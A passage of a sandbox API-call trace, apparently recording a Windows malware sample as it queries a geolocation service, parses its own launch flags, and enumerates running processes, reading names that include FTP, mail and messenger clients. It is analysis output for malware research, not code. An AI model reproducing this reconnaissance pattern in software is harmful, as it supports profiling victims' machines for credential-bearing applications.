lpUsedDefaultChar=0x0) returned 70 [0102.467] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x46) returned 0x746ca8 [0102.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x746ca8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0102.467] GetLastError () returned 0x0 [0102.467] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751528, Size=0x98) returned 0x751528 [0102.467] GetLastError () returned 0x0 [0102.583] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x750ee8) returned 0x80 [0102.583] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x750ee8) returned 0x80 [0102.583] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x750ee8) returned 0x80 [0102.595] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x8ec) returned 0x7515c8 [0102.653] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x750ee8) returned 0x80 [0102.654] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x10) returned 0x74e708 [0102.654] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x750ee8) returned 0x80 [0102.654] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x750ee8) returned 0x80 [0102.655] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x750ee8) returned 0x80 [0102.740] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x750ee8) returned 0x80 [0102.750] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0102.926] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x7453f8 [0102.926] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0104.201] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18aa20, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d220 | out: lpBuffer=0x18aa20*, lpdwNumberOfBytesRead=0x18d220*=0x1d0) returned 1 [0104.202] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0104.204] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0104.204] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x75d6f0 [0104.213] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1e0) returned 0x3327460 [0104.245] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3327460 | out: hHeap=0x730000) returned 1 [0104.254] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x75d6f0 | out: hHeap=0x730000) returned 1 [0104.254] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x7453f8 | out: hHeap=0x730000) returned 1 [0104.255] GetCurrentProcess () returned 0xffffffff [0104.255] GetLastError () returned 0x2 [0104.255] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0104.272] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x10) returned 0x781810 [0104.273] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x8ec) returned 0x33393c0 [0104.282] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x800) returned 0x7821c0 [0104.282] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7821c0, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe")) returned 0x3a [0104.282] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.291] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x3339cb8 [0104.291] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" --Admin IsNotAutoStart IsNotTask" [0104.291] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18d300 | out: pNumArgs=0x18d300) returned 0x32f5020*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" [0104.292] lstrcpyW (in: lpString1=0x18df90, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" [0104.292] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0104.292] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0104.302] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" --Admin IsNotAutoStart IsNotTask" [0104.302] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18d29c | out: pNumArgs=0x18d29c) returned 0x32f5020*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" [0104.302] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe") returned="h1rxxmJek7fnkHTT.exe" [0104.302] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0104.303] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0104.303] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0104.304] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0104.304] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0104.353] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0104.354] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0104.354] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0104.354] EnumProcesses (in: lpidProcess=0x182a98, cb=0xa000, lpcbNeeded=0x18d2a8 | out: lpidProcess=0x182a98, lpcbNeeded=0x18d2a8) returned 1 [0104.359] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0104.359] CloseHandle (hObject=0x0) returned 0 [0104.359] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0104.359] CloseHandle (hObject=0x0) returned 0 [0104.359] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0104.359] CloseHandle (hObject=0x0) returned 0 [0104.359] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0104.359] CloseHandle (hObject=0x0) returned 0 [0104.359] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0104.359] CloseHandle (hObject=0x0) returned 0 [0104.359] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0104.360] CloseHandle (hObject=0x0) returned 0 [0104.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0104.360] CloseHandle (hObject=0x0) returned 0 [0104.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0104.360] CloseHandle (hObject=0x0) returned 0 [0104.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0104.360] CloseHandle (hObject=0x0) returned 0 [0104.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0104.360] CloseHandle (hObject=0x0) returned 0 [0104.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0104.360] CloseHandle (hObject=0x0) returned 0 [0104.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0104.360] CloseHandle (hObject=0x0) returned 0 [0104.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0104.360] CloseHandle (hObject=0x0) returned 0 [0104.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0104.360] CloseHandle (hObject=0x0) returned 0 [0104.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0104.361] CloseHandle (hObject=0x0) returned 0 [0104.361] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0104.361] CloseHandle (hObject=0x0) returned 0 [0104.361] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0104.361] CloseHandle (hObject=0x0) returned 0 [0104.361] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0104.361] CloseHandle (hObject=0x0) returned 0 [0104.361] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5a8 [0104.361] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0104.361] CloseHandle (hObject=0x5a8) returned 1 [0104.361] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5a8 [0104.361] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0104.361] CloseHandle (hObject=0x5a8) returned 1 [0104.362] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0104.362] CloseHandle (hObject=0x0) returned 0 [0104.362] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0104.362] CloseHandle (hObject=0x0) returned 0 [0104.362] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a8 [0104.362] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0104.362] CloseHandle (hObject=0x5a8) returned 1 [0104.362] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x5a8 [0104.362] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0104.362] CloseHandle (hObject=0x5a8) returned 1 [0104.362] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5a8 [0104.362] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.364] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x10e0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="lemon going student.exe") returned 0x17 [0104.364] CloseHandle (hObject=0x5a8) returned 1 [0104.364] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b4) returned 0x5a8 [0104.364] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.365] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xf10000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="telling.exe") returned 0xb [0104.366] CloseHandle (hObject=0x5a8) returned 1 [0104.366] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90) returned 0x5a8 [0104.366] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.367] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x970000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="pumps wallpaper.exe") returned 0x13 [0104.367] CloseHandle (hObject=0x5a8) returned 1 [0104.367] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x67c) returned 0x5a8 [0104.367] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.369] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xb00000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="eyed.exe") returned 0x8 [0104.369] CloseHandle (hObject=0x5a8) returned 1 [0104.369] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x5a8 [0104.369] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.370] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x110000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="tracks.exe") returned 0xa [0104.371] CloseHandle (hObject=0x5a8) returned 1 [0104.371] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5a8 [0104.371] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.372] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xc60000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="influences.exe") returned 0xe [0104.372] CloseHandle (hObject=0x5a8) returned 1 [0104.372] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x5a8 [0104.372] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.374] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1150000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="sheets-soccer.exe") returned 0x11 [0104.374] CloseHandle (hObject=0x5a8) returned 1 [0104.374] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x564) returned 0x5a8 [0104.374] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.375] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xd00000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="trademark.exe") returned 0xd [0104.376] CloseHandle (hObject=0x5a8) returned 1 [0104.376] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x560) returned 0x5a8 [0104.376] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.377] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xc10000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="hypothesis_pvc_gravity.exe") returned 0x1a [0104.377] CloseHandle (hObject=0x5a8) returned 1 [0104.377] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x23c) returned 0x5a8 [0104.377] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.379] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x380000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="beginner_capacity_birds.exe") returned 0x1b [0104.379] CloseHandle (hObject=0x5a8) returned 1 [0104.379] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a8) returned 0x5a8 [0104.379] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.380] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x12b0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="tissuesatininf.exe") returned 0x12 [0104.381] CloseHandle (hObject=0x5a8) returned 1 [0104.381] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7bc) returned 0x5a8 [0104.381] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.382] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xc80000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="algorithms-downloading.exe") returned 0x1a [0104.382] CloseHandle (hObject=0x5a8) returned 1 [0104.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5dc) returned 0x5a8 [0104.382] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.384] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x3c0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="dakota.exe") returned 0xa [0104.384] CloseHandle (hObject=0x5a8) returned 1 [0104.384] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a4) returned 0x5a8 [0104.384] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.385] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xbc0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="gramstruth.exe") returned 0xe [0104.386] CloseHandle (hObject=0x5a8) returned 1 [0104.386] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e8) returned 0x5a8 [0104.386] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.387] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x3e0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="true.exe") returned 0x8 [0104.387] CloseHandle (hObject=0x5a8) returned 1 [0104.387] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d4) returned 0x5a8 [0104.387] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.389] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x3e0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="sharingaccredited.exe") returned 0x15 [0104.389] CloseHandle (hObject=0x5a8) returned 1 [0104.389] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f4) returned 0x5a8 [0104.389] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.390] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x12d0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0104.391] CloseHandle (hObject=0x5a8) returned 1 [0104.391] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x5a8 [0104.391] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.392] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xe60000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0104.392] CloseHandle (hObject=0x5a8) returned 1 [0104.392] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x5a8 [0104.392] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.394] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1280000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0104.394] CloseHandle (hObject=0x5a8) returned 1 [0104.394] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x634) returned 0x5a8 [0104.394] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.395] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x10f0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0104.396] CloseHandle (hObject=0x5a8) returned 1 [0104.396] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x5a8 [0104.396] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.397] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x11b0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0104.397] CloseHandle (hObject=0x5a8) returned 1 [0104.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5a8 [0104.397] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.399] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xb50000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0104.399] CloseHandle (hObject=0x5a8) returned 1 [0104.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x5a8 [0104.399] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.400] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xcb0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0104.401] CloseHandle (hObject=0x5a8) returned 1 [0104.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x5a8 [0104.401] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.404] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1170000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0104.404] CloseHandle (hObject=0x5a8) returned 1 [0104.404] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x54c) returned 0x5a8 [0104.404] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.405] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x10f0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0104.406] CloseHandle (hObject=0x5a8) returned 1 [0104.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6f4) returned 0x5a8 [0104.406] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.407] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xe70000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0104.407] CloseHandle (hObject=0x5a8) returned 1 [0104.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x290) returned 0x5a8 [0104.407] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.409] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xef0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0104.409] CloseHandle (hObject=0x5a8) returned 1 [0104.409] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x5a8 [0104.409] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.410] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1320000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0104.411] CloseHandle (hObject=0x5a8) returned 1 [0104.411] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c0) returned 0x5a8 [0104.411] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.412] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xa70000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0104.412] CloseHandle (hObject=0x5a8) returned 1 [0104.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x51c) returned 0x5a8 [0104.413] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.414] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1c0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0104.414] CloseHandle (hObject=0x5a8) returned 1 [0104.414] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x5a8 [0104.414] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.415] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1230000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0104.416] CloseHandle (hObject=0x5a8) returned 1 [0104.416] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x5a8 [0104.416] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.417] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xfd0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0104.433] CloseHandle (hObject=0x5a8) returned 1 [0104.433] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x31c) returned 0x5a8 [0104.433] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, 